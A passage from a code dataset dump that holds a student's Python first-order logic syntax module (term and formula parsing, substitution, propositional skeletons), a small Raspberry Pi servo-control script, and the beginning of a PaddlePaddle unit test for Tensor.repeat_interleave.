<= 't' and s.isalnum()\n\n\n@frozen\nclass Term:\n \"\"\"An immutable first-order term in tree representation, composed from\n variable names and constant names, and function names applied to them.\n\n Attributes:\n root (`str`): the constant name, variable name, or function name at the\n root of the term tree.\n arguments (`~typing.Optional`\\\\[`~typing.Tuple`\\\\[`Term`, ...]]): the\n arguments to the root, if the root is a function name.\n \"\"\"\n root: str\n arguments: Optional[Tuple[Term, ...]]\n\n def __init__(self, root: str,\n arguments: Optional[Sequence[Term]] = None) -> None:\n \"\"\"Initializes a `Term` from its root and root arguments.\n\n Parameters:\n root: the root for the term tree.\n arguments: the arguments to the root, if the root is a function\n name.\n \"\"\"\n if is_constant(root) or is_variable(root):\n assert arguments is None\n self.root = root\n else:\n assert is_function(root)\n assert arguments is not None\n self.root = root\n self.arguments = tuple(arguments)\n assert len(self.arguments) > 0\n\n def __repr__(self) -> str:\n \"\"\"Computes the string representation of the current term.\n\n Returns:\n The standard string representation of the current term.\n \"\"\"\n # Task 7.1\n if is_variable(self.root):\n return self.root\n elif is_constant(self.root):\n return self.root\n elif is_function(self.root): # for example- s(0) or f(s(0)) where s(0) is also function call\n output = self.root + '('\n for i in range(len(self.arguments)):\n output = output + self.arguments[i].__repr__() + \",\" # recursion\n return output[:len(output) - 1] + ')'\n else:\n pass\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is a `Term` object that equals the\n current term, ``False`` otherwise.\n \"\"\"\n return isinstance(other, Term) and str(self) == str(other)\n\n def __ne__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is not a `Term` object or does not\n equal the current term, ``False`` otherwise.\n \"\"\"\n return not self == other\n\n def __hash__(self) -> int:\n return hash(str(self))\n\n @staticmethod\n def parse_prefix(s: str) -> Tuple[Term, str]:\n \"\"\"Parses a prefix of the given string into a term.\n\n Parameters:\n s: string to parse, which has a prefix that is a valid\n representation of a term.\n\n Returns:\n A pair of the parsed term and the unparsed suffix of the string. If\n the given string has as a prefix a constant name (e.g., ``'c12'``)\n or a variable name (e.g., ``'x12'``), then the parsed prefix will be\n that entire name (and not just a part of it, such as ``'x1'``).\n \"\"\"\n # Task 7.3.1\n if s == \"\":\n return None, ''\n term, i = Term._parse_prefix_helper(s, 0)\n if term is not None:\n return term, s[i:]\n return None, ''\n\n @staticmethod\n def _parse_prefix_helper(string_to_parse: str, index: int) -> Tuple[Union[Term, None], Union[int, str]]:\n \"\"\"\n :param string_to_parse: String to parse (str).\n :param index: index (integer)\n :return: Term object.\n \"\"\"\n\n if is_variable(string_to_parse[index]) or is_constant(string_to_parse[index]):\n\n if string_to_parse[index] == '_': # const case that start with '_' so the root need to be '_'\n return Term(string_to_parse[index]), index + 1\n\n variable = string_to_parse[index]\n index += 1\n while index != len(string_to_parse) and string_to_parse[\n index].isalnum(): # a while loop to extract var name\n variable += string_to_parse[index]\n index += 1\n return Term(variable), index\n\n elif is_function(string_to_parse[index]):\n func_name = string_to_parse[index:string_to_parse.find(\"(\", index)] # extract function name\n index += len(func_name) + 1\n\n arguments = []\n while string_to_parse[index] != \")\": # extract function arguments\n if string_to_parse[index] == \",\":\n index += 1\n continue\n argument, index = Term._parse_prefix_helper(string_to_parse, index)\n arguments.append(argument)\n return Term(func_name, arguments), index + 1\n\n else:\n return None, ''\n\n @staticmethod\n def parse(s: str) -> Term:\n \"\"\"Parses the given valid string representation into a term.\n\n Parameters:\n s: string to parse.\n\n Returns:\n A term whose standard string representation is the given string.\n \"\"\"\n # Task 7.3.2\n term, string = Term.parse_prefix(s)\n return term\n\n def constants(self) -> Set[str]:\n \"\"\"Finds all constant names in the current term.\n\n Returns:\n A set of all constant names used in the current term.\n \"\"\"\n my_set = set()\n if is_constant(self.root):\n my_set.add(self.root)\n return my_set\n\n elif is_function(self.root):\n my_set = set()\n for argument in self.arguments:\n my_set = my_set.union(argument.constants())\n return my_set\n else:\n return set()\n\n def variables(self) -> Set[str]:\n \"\"\"Finds all variable names in the current term.\n\n Returns:\n A set of all variable names used in the current term.\n \"\"\"\n # Task 7.5.2\n my_set = set()\n if is_variable(self.root):\n my_set.add(self.root)\n return my_set\n\n elif is_function(self.root):\n my_set = set()\n for argument in self.arguments:\n my_set = my_set.union(argument.variables())\n return my_set\n else:\n return set()\n\n def functions(self) -> Set[Tuple[str, int]]:\n \"\"\"Finds all function names in the current term, along with their\n arities.\n\n Returns:\n A set of pairs of function name and arity (number of arguments) for\n all function names used in the current term.\n \"\"\"\n # Task 7.5.3\n\n if is_function(self.root):\n my_set = set()\n my_set.add((self.root, len(self.arguments)))\n for argument in self.arguments:\n my_set = my_set.union(argument.functions())\n return my_set\n else:\n return set()\n\n def substitute(self, substitution_map: Mapping[str, Term],\n forbidden_variables: AbstractSet[str] = frozenset()) -> Term:\n \"\"\"Substitutes in the current term, each constant name `name` or\n variable name `name` that is a key in `substitution_map` with the term\n `substitution_map[name]`.\n\n Parameters:\n substitution_map: mapping defining the substitutions to be\n performed.\n forbidden_variables: variables not allowed in substitution terms.\n\n Returns:\n The term resulting from performing all substitutions. Only\n constant names and variable names originating in the current term\n are substituted (i.e., those originating in one of the specified\n substitutions are not subjected to additional substitutions).\n\n Raises:\n ForbiddenVariableError: If a term that is used in the requested\n substitution contains a variable from `forbidden_variables`.\n\n Examples:\n >>> Term.parse('f(x,c)').substitute(\n ... {'c': Term.parse('plus(d,x)'), 'x': Term.parse('c')}, {'y'})\n f(c,plus(d,x))\n >>> Term.parse('f(x,c)').substitute(\n ... {'c': Term.parse('plus(d,y)')}, {'y'})\n Traceback (most recent call last):\n ...\n predicates.syntax.ForbiddenVariableError: y\n \"\"\"\n if is_variable(self.root) or is_constant(self.root):\n if self.root in substitution_map.keys():\n if substitution_map[self.root].root not in forbidden_variables:\n if is_function(substitution_map[self.root].root):\n self._check_forbidden_vars(substitution_map[self.root].arguments,\n forbidden_variables)\n return Term(substitution_map[self.root].root, substitution_map[self.root].arguments)\n else:\n return Term(substitution_map[self.root].root)\n else:\n raise ForbiddenVariableError(substitution_map[self.root].root)\n\n elif is_function(self.root):\n new_arguments_list = []\n for ind in range(len(self.arguments)):\n new_arguments_list.append(self.arguments[ind].substitute(substitution_map, forbidden_variables))\n return Term(self.root, tuple(new_arguments_list))\n\n if self.root in substitution_map.keys():\n return self._check_forbidden_vars(substitution_map[self.root].arguments, forbidden_variables)\n\n else:\n return self\n\n def _check_forbidden_vars(self, arguments, forbidden_variables):\n \"\"\"\n Helper for substitute. Throws the exception if needed.\n \"\"\"\n for argument in arguments:\n if is_function(argument.root):\n return self._check_forbidden_vars(argument.arguments, forbidden_variables)\n else:\n if argument.root in forbidden_variables:\n raise ForbiddenVariableError(argument.root)\n\n\ndef is_equality(s: str) -> bool:\n \"\"\"Checks if the given string is the equality relation.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is the equality relation, ``False``\n otherwise.\n \"\"\"\n return s == '='\n\n\ndef is_relation(s: str) -> bool:\n \"\"\"Checks if the given string is a relation name.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a relation name, ``False`` otherwise.\n \"\"\"\n return s[0] >= 'F' and s[0] <= 'T' and s.isalnum()\n\n\ndef is_unary(s: str) -> bool:\n \"\"\"Checks if the given string is a unary operator.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a unary operator, ``False`` otherwise.\n \"\"\"\n return s == '~'\n\n\ndef is_binary(s: str) -> bool:\n \"\"\"Checks if the given string is a binary operator.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a binary operator, ``False`` otherwise.\n \"\"\"\n return s == '&' or s == '|' or s == '->'\n\n\ndef is_quantifier(s: str) -> bool:\n \"\"\"Checks if the given string is a quantifier.\n\n Parameters:\n s: string to check.\n\n Returns:\n ``True`` if the given string is a quantifier, ``False`` otherwise.\n \"\"\"\n return s == 'A' or s == 'E'\n\n\n@frozen\nclass Formula:\n \"\"\"An immutable first-order term in tree representation, composed from\n relation names applied to first-order terms, and operators and\n quantifications applied to them.\n\n Attributes:\n root (`str`): the relation name, equality relation, operator, or\n quantifier at the root of the term tree.\n arguments (`~typing.Optional`\\\\[`~typing.Tuple`\\\\[`Term`, ...]]): the\n arguments to the root, if the root is a relation name or the\n equality relation.\n first (`~typing.Optional`\\\\[`Formula`]): the first operand to the root,\n if the root is a unary or binary operator.\n second (`~typing.Optional`\\\\[`Formula`]): the second\n operand to the root, if the root is a binary operator.\n variable (`~typing.Optional`\\\\[`str`]): the variable name quantified by\n the root, if the root is a quantification.\n predicate (`~typing.Optional`\\\\[`Formula`]): the predicate quantified by\n the root, if the root is a quantification.\n \"\"\"\n root: str\n arguments: Optional[Tuple[Term, ...]]\n first: Optional[Formula]\n second: Optional[Formula]\n variable: Optional[str]\n predicate: Optional[Formula]\n\n def __init__(self, root: str,\n arguments_or_first_or_variable: Union[Sequence[Term],\n Formula, str],\n second_or_predicate: Optional[Formula] = None) -> None:\n \"\"\"Initializes a `Formula` from its root and root arguments, root\n operands, or root quantified variable and predicate.\n\n Parameters:\n root: the root for the term tree.\n arguments_or_first_or_variable: the arguments to the the root, if\n the root is a relation name or the equality relation; the first\n operand to the root, if the root is a unary or binary operator;\n the variable name quantified by the root, if the root is a\n quantification.\n second_or_predicate: the second operand to the root, if the root is\n a binary operator; the predicate quantified by the root, if the\n root is a quantification.\n \"\"\"\n if is_equality(root) or is_relation(root):\n # Populate self.root and self.arguments\n assert second_or_predicate is None\n assert isinstance(arguments_or_first_or_variable, Sequence) and \\\n not isinstance(arguments_or_first_or_variable, str)\n self.root, self.arguments = \\\n root, tuple(arguments_or_first_or_variable)\n if is_equality(root):\n assert len(self.arguments) == 2\n elif is_unary(root):\n # Populate self.first\n assert isinstance(arguments_or_first_or_variable, Formula) and \\\n second_or_predicate is None\n self.root, self.first = root, arguments_or_first_or_variable\n elif is_binary(root):\n # Populate self.first and self.second\n assert isinstance(arguments_or_first_or_variable, Formula) and \\\n second_or_predicate is not None\n self.root, self.first, self.second = \\\n root, arguments_or_first_or_variable, second_or_predicate\n else:\n assert is_quantifier(root)\n # Populate self.variable and self.predicate\n assert isinstance(arguments_or_first_or_variable, str) and \\\n is_variable(arguments_or_first_or_variable) and \\\n second_or_predicate is not None\n self.root, self.variable, self.predicate = \\\n root, arguments_or_first_or_variable, second_or_predicate\n\n def __repr__(self) -> str:\n \"\"\"Computes the string representation of the current term.\n\n Returns:\n The standard string representation of the current term.\n \"\"\"\n # Task 7.2\n if is_function(self.root) or is_constant(self.root) or is_variable(self.root):\n return str(self)\n elif is_unary(self.root): # ~x\n return \"~\" + self.first.__repr__()\n elif is_quantifier(self.root): # Ax[Ex..]\n return self.root + self.variable + \"[\" + self.predicate.__repr__() + \"]\"\n elif is_binary(self.root): # (x&y)\n return \"(\" + self.first.__repr__() + self.root + self.second.__repr__() + \")\"\n elif is_equality(self.root): # x=y\n return self.arguments[0].__repr__() + self.root + self.arguments[1].__repr__()\n elif is_relation(self.root): # R(X,Y,Z)\n output = self.root + \"(\"\n for i in range(len(self.arguments)):\n output += self.arguments[i].__repr__() + \",\"\n if not self.arguments:\n return output + \")\"\n return output[:len(output) - 1] + \")\"\n\n def __eq__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is a `Formula` object that equals the\n current term, ``False`` otherwise.\n \"\"\"\n return isinstance(other, Formula) and str(self) == str(other)\n\n def __ne__(self, other: object) -> bool:\n \"\"\"Compares the current term with the given one.\n\n Parameters:\n other: object to compare to.\n\n Returns:\n ``True`` if the given object is not a `Formula` object or does not\n equal the current term, ``False`` otherwise.\n \"\"\"\n return not self == other\n\n def __hash__(self) -> int:\n return hash(str(self))\n\n @staticmethod\n def parse_prefix(s: str) -> Tuple[Formula, str]:\n \"\"\"Parses a prefix of the given string into a term.\n\n Parameters:\n s: string to parse, which has a prefix that is a valid\n representation of a term.\n\n Returns:\n A pair of the parsed term and the unparsed suffix of the string.\n If the given string has as a prefix a term followed by an equality\n followed by a constant name (e.g., ``'c12'``) or by a variable name\n (e.g., ``'x12'``), then the parsed prefix will include that entire\n name (and not just a part of it, such as ``'x1'``).\n \"\"\"\n # Task 7.4.1\n if s == '':\n return None, ''\n formula, remainder = Formula._parse_prefix_helper(s)\n return formula, remainder\n\n @staticmethod\n def _parse_prefix_helper(s: str) -> Tuple[Formula, str]:\n \"\"\"\n Helper method for the method Formula.parse_prefix(s: str).\n :param s: string to parse.\n :return: Tuple of term object and string (a remainder).\n \"\"\"\n first_char = s[0]\n\n if is_constant(first_char):\n t1, remainder = Term.parse_prefix(s)\n if len(remainder) > 0:\n if remainder[0] == '=':\n parsed_remainder = Term.parse_prefix(remainder[1:])\n return Formula('=', [t1, parsed_remainder[0]]), parsed_remainder[1]\n return t1, remainder\n\n elif is_variable(first_char):\n t1, remainder = Term.parse_prefix(s)\n if remainder[0] == '=':\n t2, remainder2 = Term.parse_prefix(remainder[1:])\n return Formula('=', [t1, t2]), remainder2 # Changed this line at ex8\n\n elif is_function(first_char):\n t1, remainder = Term.parse_prefix(s)\n if remainder[0] == '=':\n t2, remainder2 = Term.parse_prefix(remainder[1:])\n return Formula('=', [t1, t2]), remainder2\n\n elif is_relation(first_char):\n return Formula._helper_parse_prefix_is_relation(s)\n\n elif first_char == '(':\n return Formula._helper_parse_prefix_is_parenthesis(s)\n\n elif is_quantifier(first_char):\n return Formula._helper_parse_prefix_is_quantifier(s)\n\n elif is_unary(first_char):\n return Formula._helper_parse_prefix_is_unary(s)\n\n else:\n raise Exception('Omers Exception: Undefined operation')\n\n @staticmethod\n def _helper_parse_prefix_is_quantifier(s):\n \"\"\"\n Helper.\n \"\"\"\n quantifier, index = s[0], 1\n variable = s[index]\n while is_variable(variable + s[index + 1]): # Getting variable name.\n index += 1\n variable += s[index]\n index += 2 # Skip the squared parentheses.\n formula = s[index]\n index += 1\n square_parentheses_counter = 1\n while square_parentheses_counter != 0 and index < len(s):\n if s[index] == '[':\n square_parentheses_counter += 1\n elif s[index] == ']':\n square_parentheses_counter -= 1\n\n if square_parentheses_counter == 0:\n break\n\n formula += s[index]\n index += 1\n if index >= len(s) - 1:\n return Formula(quantifier, variable, Formula._parse_prefix_helper(formula)[0]), ''\n return Formula(quantifier, variable, Formula._parse_prefix_helper(formula)[0]), s[index + 1:]\n\n @staticmethod\n def _helper_parse_prefix_is_parenthesis(s):\n \"\"\"\n Helper.\n \"\"\"\n parentheses_counter, ind_of_closer, ind_of_op = 1, 0, 0 # ind of the ')' and ind of the operator.\n char_ind = 1\n while parentheses_counter != 0:\n if (is_binary(s[char_ind]) or is_binary(s[char_ind: char_ind + 2])) and parentheses_counter == 1:\n ind_of_op = char_ind\n elif s[char_ind] == '(':\n parentheses_counter += 1\n elif s[char_ind] == ')':\n parentheses_counter -= 1\n char_ind += 1\n ind_of_closer = char_ind - 1\n operator = s[ind_of_op] if (is_unary(s[ind_of_op]) or s[ind_of_op] in ['&', '|']) else s[\n ind_of_op: ind_of_op + 2]\n first_part = s[1: ind_of_op]\n second_part = s[ind_of_op + 2: ind_of_closer] if operator == '->' else s[ind_of_op + 1: ind_of_closer]\n return Formula(operator, Formula._parse_prefix_helper(first_part)[0],\n Formula._parse_prefix_helper(second_part)[0]), s[ind_of_closer + 1:]\n\n @staticmethod\n def _helper_parse_prefix_is_relation(s):\n \"\"\"\n Helper.\n \"\"\"\n if len(s) == 1 or '(' not in s:\n return Formula(s, []), ''\n r, index = s[0], 1\n try:\n while s[index] != '(':\n r += s[index]\n index += 1\n except IndexError:\n print('a')\n term, remainder = Term.parse_prefix(s[index + 1:])\n terms = [term] if term is not None else None\n\n if term is None:\n return Formula(r, []), s[index + 2:]\n\n while remainder[0] != ')':\n term, remainder = Term.parse_prefix(remainder[1:])\n terms.append(term)\n if len(remainder) == 1:\n return Formula(r, terms), ''\n return Formula(r, terms), remainder[1:]\n\n @staticmethod\n def _helper_parse_prefix_is_unary(s):\n \"\"\"\n Helper.\n \"\"\"\n if is_variable(s[1]):\n parsed_remainder = Formula._parse_prefix_helper(s[1:])\n s = '~' + str(parsed_remainder[0]) + parsed_remainder[1]\n return Formula('~', parsed_remainder[0]), parsed_remainder[1]\n\n else:\n remained_formula = s[1:]\n return Formula('~', Formula._parse_prefix_helper(remained_formula)[0]), \\\n Formula._parse_prefix_helper(remained_formula)[1]\n\n @staticmethod\n def parse(s: str) -> Formula:\n \"\"\"Parses the given valid string representation into a term.\n\n Parameters:\n s: string to parse.\n\n Returns:\n A term whose standard string representation is the given string.\n \"\"\"\n # Task 7.4.2\n formula, string = Formula.parse_prefix(s)\n return formula\n\n def constants(self) -> Set[str]:\n \"\"\"Finds all constant names in the current term.\n\n Returns:\n A set of all constant names used in the current term.\n \"\"\"\n # Task 7.6.1\n constants_to_return = set()\n if is_unary(self.root):\n constants_to_return = constants_to_return.union(self.first.constants())\n return constants_to_return\n elif is_binary(self.root):\n constants_to_return = constants_to_return.union(self.first.constants())\n constants_to_return = constants_to_return.union(self.second.constants())\n elif is_relation(self.root):\n for argument in self.arguments:\n constants_to_return = constants_to_return.union(argument.constants())\n elif is_quantifier(self.root):\n constants_to_return = constants_to_return.union(self.predicate.constants())\n elif is_equality(self.root):\n for argument in self.arguments:\n constants_to_return = constants_to_return.union(argument.constants())\n return constants_to_return\n\n def variables(self) -> Set[str]:\n \"\"\"Finds all variable names in the current term.\n\n Returns:\n A set of all variable names used in the current term.\n \"\"\"\n # Task 7.6.2\n variables_to_return = set()\n if is_unary(self.root):\n variables_to_return = variables_to_return.union(self.first.variables())\n return variables_to_return\n elif is_binary(self.root):\n variables_to_return = variables_to_return.union(self.first.variables())\n variables_to_return = variables_to_return.union(self.second.variables())\n elif is_relation(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n elif is_quantifier(self.root):\n variables_to_return = variables_to_return.union(self.predicate.variables())\n variables_to_return = variables_to_return.union(self.variable)\n elif is_equality(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n return variables_to_return\n\n def free_variables(self) -> Set[str]:\n \"\"\"Finds all variable names that are free in the current term.\n\n Returns:\n A set of all variable names used in the current term not only\n within a scope of a quantification on those variable names.\n \"\"\"\n # Task 7.6.3\n variables_to_return = set()\n if is_unary(self.root):\n variables_to_return = variables_to_return.union(self.first.free_variables())\n return variables_to_return\n elif is_binary(self.root):\n variables_to_return = variables_to_return.union(self.first.free_variables())\n variables_to_return = variables_to_return.union(self.second.free_variables())\n elif is_relation(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n elif is_quantifier(self.root):\n variables_to_return = variables_to_return.union(self.predicate.free_variables())\n if self.variable in variables_to_return:\n variables_to_return.remove(self.variable)\n elif is_equality(self.root):\n for argument in self.arguments:\n variables_to_return = variables_to_return.union(argument.variables())\n return variables_to_return\n\n def functions(self) -> Set[Tuple[str, int]]:\n \"\"\"Finds all function names in the current term, along with their\n arities.\n\n Returns:\n A set of pairs of function name and arity (number of arguments) for\n all function names used in the current term.\n \"\"\"\n # Task 7.6.4\n functions_to_return = set()\n if is_unary(self.root):\n functions_to_return = functions_to_return.union(self.first.functions())\n return functions_to_return\n elif is_binary(self.root):\n functions_to_return = functions_to_return.union(self.first.functions())\n functions_to_return = functions_to_return.union(self.second.functions())\n elif is_relation(self.root):\n for argument in self.arguments:\n functions_to_return = functions_to_return.union(argument.functions())\n elif is_quantifier(self.root):\n functions_to_return = functions_to_return.union(self.predicate.functions())\n if self.variable in functions_to_return:\n functions_to_return.remove(self.variable)\n elif is_equality(self.root):\n for argument in self.arguments:\n functions_to_return = functions_to_return.union(argument.functions())\n return functions_to_return\n\n def relations(self) -> Set[Tuple[str, int]]:\n \"\"\"Finds all relation names in the current term, along with their arities.\n\n Returns:\n A set of pairs of relation name and arity (number of arguments) for\n all relation names used in the current term.\n \"\"\"\n # Task 7.6.5\n relations_to_return = set()\n if is_variable(self.root) or is_function(self.root) or is_constant(self.root):\n return relations_to_return\n elif is_relation(self.root):\n return {(self.root, len(self.arguments))}\n elif is_binary(self.root):\n relations_to_return = relations_to_return.union(Formula.relations(self.first))\n relations_to_return = relations_to_return.union(Formula.relations(self.second))\n return relations_to_return\n elif is_unary(self.root):\n relations_to_return = relations_to_return.union(Formula.relations(self.first))\n return relations_to_return\n elif is_quantifier(self.root):\n relations_to_return = relations_to_return.union(Formula.relations(self.predicate))\n return relations_to_return\n elif is_equality(self.root):\n return relations_to_return\n else:\n raise Exception('7.6.5: Undefined action.')\n\n def substitute(self, substitution_map: Mapping[str, Term],\n forbidden_variables: AbstractSet[str] = frozenset()) -> Formula:\n \"\"\"Substitutes in the current term, each constant name `name` or free\n occurrence of variable name `name` that is a key in `substitution_map`\n with the term `substitution_map[name]`.\n\n Parameters:\n substitution_map: mapping defining the substitutions to be\n performed.\n forbidden_variables: variables not allowed in substitution terms.\n\n Returns:\n The term resulting from performing all substitutions. Only\n constant names and variable names originating in the current term\n are substituted (i.e., those originating in one of the specified\n substitutions are not subjected to additional substitutions).\n\n Raises:\n ForbiddenVariableError: If a term that is used in the requested\n substitution contains a variable from `forbidden_variables`\n or a variable occurrence that becomes bound when that term is\n substituted into the current term.\n\n Examples:\n >>> Formula.parse('Ay[x=c]').substitute(\n ... {'c': Term.parse('plus(d,x)'), 'x': Term.parse('c')}, {'z'})\n Ay[c=plus(d,x)]\n >>> Formula.parse('Ay[x=c]').substitute(\n ... {'c': Term.parse('plus(d,z)')}, {'z'})\n Traceback (most recent call last):\n ...\n predicates.syntax.ForbiddenVariableError: z\n >>> Formula.parse('Ay[x=c]').substitute(\n ... {'c': Term.parse('plus(d,y)')})\n Traceback (most recent call last):\n ...\n predicates.syntax.ForbiddenVariableError: y\n \"\"\"\n for element_name in substitution_map:\n assert is_constant(element_name) or is_variable(element_name)\n for variable in forbidden_variables:\n assert is_variable(variable)\n # Task 9.2\n\n if is_quantifier(self.root):\n quantifier, variable, predicate = self.root, self.variable, self.predicate\n substitution_map = {k: v for k, v in substitution_map.items() if k != variable}\n\n new_forbidden = set([v for v in forbidden_variables] + [self.variable])\n\n return Formula(\n root=quantifier,\n arguments_or_first_or_variable=variable,\n second_or_predicate=predicate.substitute(substitution_map, new_forbidden))\n\n elif is_binary(self.root):\n operator, first, second = self.root, self.first, self.second\n return Formula(\n root=operator,\n arguments_or_first_or_variable=first.substitute(substitution_map, forbidden_variables),\n second_or_predicate=second.substitute(substitution_map, forbidden_variables))\n\n elif is_unary(self.root):\n operator, first = self.root, self.first\n return Formula(\n root=operator,\n arguments_or_first_or_variable=first.substitute(substitution_map, forbidden_variables))\n\n elif is_equality(self.root):\n operator, first, second = self.root, self.arguments[0], self.arguments[1]\n return Formula(\n root=operator,\n arguments_or_first_or_variable=[first.substitute(substitution_map, forbidden_variables),\n second.substitute(substitution_map, forbidden_variables)])\n\n elif is_relation(self.root):\n if self.root in substitution_map.keys():\n relation = substitution_map[self.root]\n else:\n relation = self.root\n new_arguments_list = []\n for arg in self.arguments:\n new_arguments_list.append(arg.substitute(substitution_map, forbidden_variables))\n return Formula(\n root=relation,\n arguments_or_first_or_variable=new_arguments_list)\n\n else:\n assert ()\n\n def _check_forbidden_vars(self, term: Term, forbidden_variables: AbstractSet[str] = frozenset()) -> Term:\n \"\"\"Helper for substitute. Throws the exception if needed.\"\"\"\n for forbidden_var in forbidden_variables:\n if forbidden_var in self.variables() or forbidden_var in term.variables():\n raise ForbiddenVariableError(forbidden_var)\n return term\n\n def propositional_skeleton(self) -> Tuple[PropositionalFormula,\n Mapping[str, Formula]]:\n \"\"\"Computes a propositional skeleton of the current term.\n\n Returns:\n A pair. The first element of the pair is a propositional term\n obtained from the current term by substituting every (outermost)\n subformula that has a relation or quantifier at its root with an\n atomic propositional term, consistently such that multiple equal\n such (outermost) subformulas are substituted with the same atomic\n propositional term. The atomic propositional formulas used for\n substitution are obtained, from left to right, by calling\n `next`\\ ``(``\\ `~logic_utils.fresh_variable_name_generator`\\ ``)``.\n The second element of the pair is a map from each atomic\n propositional term to the subformula for which it was\n substituted.\n \"\"\"\n # Task 9.8\n formula = Formula.parse(str(self))\n map_to_return = {}\n\n if is_unary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n map_to_return = {v.root: k for k, v in return_map.items()}\n form = PropositionalFormula(self.root, first)\n return PropositionalFormula.parse(str(form)), map_to_return\n\n if is_binary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n second, return_map = self.second.__helper_to_propositional_skeleton(map_to_return)\n map_to_return = {v.root: k for k, v in return_map.items()}\n form = PropositionalFormula(self.root, first, second)\n return PropositionalFormula.parse(str(form)), map_to_return\n\n else:\n formula, map_to_return = formula.__helper_to_propositional_skeleton(map_to_return)\n map_to_return = {v.root: k for k, v in map_to_return.items()}\n return PropositionalFormula.parse(str(formula)), map_to_return\n\n def __helper_to_propositional_skeleton(self, map_to_return):\n if is_constant(self.root) or is_variable(self.root):\n return PropositionalFormula(self.root), map_to_return\n\n elif is_unary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n form = PropositionalFormula(self.root, first)\n return form, map_to_return\n\n elif is_binary(self.root):\n first, return_map = self.first.__helper_to_propositional_skeleton(map_to_return)\n second, return_map = self.second.__helper_to_propositional_skeleton(map_to_return)\n form = PropositionalFormula(self.root, first, second)\n return form, map_to_return\n\n elif is_relation(self.root) or is_equality(self.root) or is_quantifier(self.root) or is_function(self.root):\n if self in map_to_return:\n return PropositionalFormula(str(map_to_return[self])), map_to_return\n var = Term(next(fresh_variable_name_generator))\n map_to_return[self] = var\n return PropositionalFormula(str(var)), map_to_return\n\n @staticmethod\n def from_propositional_skeleton(skeleton: PropositionalFormula,\n substitution_map: Mapping[str, Formula]) -> \\\n Formula:\n \"\"\"Computes a first-order term from a propositional skeleton and a\n substitution map.\n\n Arguments:\n skeleton: propositional skeleton for the term to compute.\n substitution_map: a map from each atomic propositional subformula\n of the given skeleton to a first-order term.\n\n Returns:\n A first-order term obtained from the given propositional skeleton\n by substituting each atomic propositional subformula with the term\n mapped to it by the given map.\n \"\"\"\n for key in substitution_map:\n assert is_propositional_variable(key)\n # Task 9.10\n formula = Formula.__helper_to_from_propositional_skeleton(skeleton, substitution_map)\n return Formula.parse(str(formula))\n\n @staticmethod\n def __helper_to_from_propositional_skeleton(skeleton, substitution_map):\n if is_constant(skeleton.root) or is_variable(skeleton.root):\n if skeleton.root in substitution_map:\n return substitution_map[skeleton.root]\n\n elif is_unary(skeleton.root):\n first = Formula.__helper_to_from_propositional_skeleton(skeleton.first, substitution_map)\n form = Formula(skeleton.root, first)\n return form\n\n elif is_binary(skeleton.root):\n first = Formula.__helper_to_from_propositional_skeleton(skeleton.first, substitution_map)\n second = Formula.__helper_to_from_propositional_skeleton(skeleton.second, substitution_map)\n form = Formula(skeleton.root, first, second)\n return form\n","sub_path":"ex12/code/predicates/syntax.py","file_name":"syntax.py","file_ext":"py","file_size_in_byte":41611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"600218318","text":"import RPi.GPIO as GPIO\nimport smbus\nimport sys\nimport time\n\nGPIO.setmode(GPIO.BOARD)\n\ndef moveServo(y):\n\tservo = 35;\n\tfrequency = 200;\n\n\tGPIO.setup(servo, GPIO.OUT);\n\n\tpwm = GPIO.PWM(servo, frequency);\n\n\tPos = 1.22 + ((float(y)) * .0075)\n\n\tmsPerCycle = 1000 / frequency;\n\n\tdutyCycle = Pos * 100 / msPerCycle;\n\tpwm.start(dutyCycle);\n\ttime.sleep(2);\n\tpwm.stop()\n\tGPIO.cleanup()\n\nif __name__ == '__main__':\n\tmoveServo(sys.argv[1]);\n","sub_path":"middle.py","file_name":"middle.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"539379597","text":"#!/bin/env python\n# -*- coding: utf-8 -*-\n# encoding=utf-8 vi:ts=4:sw=4:expandtab:ft=python\n\"\"\"\ntest_Tensor_repeat_interleave\n\"\"\"\n\nfrom apibase import APIBase\nfrom apibase import randtool\nimport paddle\nimport pytest\nimport numpy as np\n\n\nclass TestRepeatInterleave(APIBase):\n \"\"\"\n test\n \"\"\"\n\n def hook(self):\n \"\"\"\n implement\n \"\"\"\n self.types = [np.float32, np.float64]\n # self.debug = True\n # self.static = False\n # enable check grad\n # self.enable_backward = False\n # self.delta = 1e-5\n\n\nobj = TestRepeatInterleave(paddle.Tensor.repeat_interleave)\n\n\n@pytest.mark.api_base_repeat_interleave_vartype\ndef test_repeat_interleave_base():\n \"\"\"\n base\n \"\"\"\n x = randtool(\"float\", 0, 1, (4,))\n res = np.repeat(x, 3)\n obj.base(res=res, x=x, repeats=3)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave0():\n \"\"\"\n x: 2d-tensor\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave1():\n \"\"\"\n x: 3d-tensor\n \"\"\"\n x = randtool(\"float\", -2, 2, (4, 2, 4))\n res = np.repeat(x, 2)\n obj.run(res=res, x=x, repeats=2)\n\n\n@pytest.mark.api_base_repeat_interleave_parameters\ndef test_repeat_interleave2():\n \"\"\"\n x: 4d-tensor\n \"\"\"\n x = 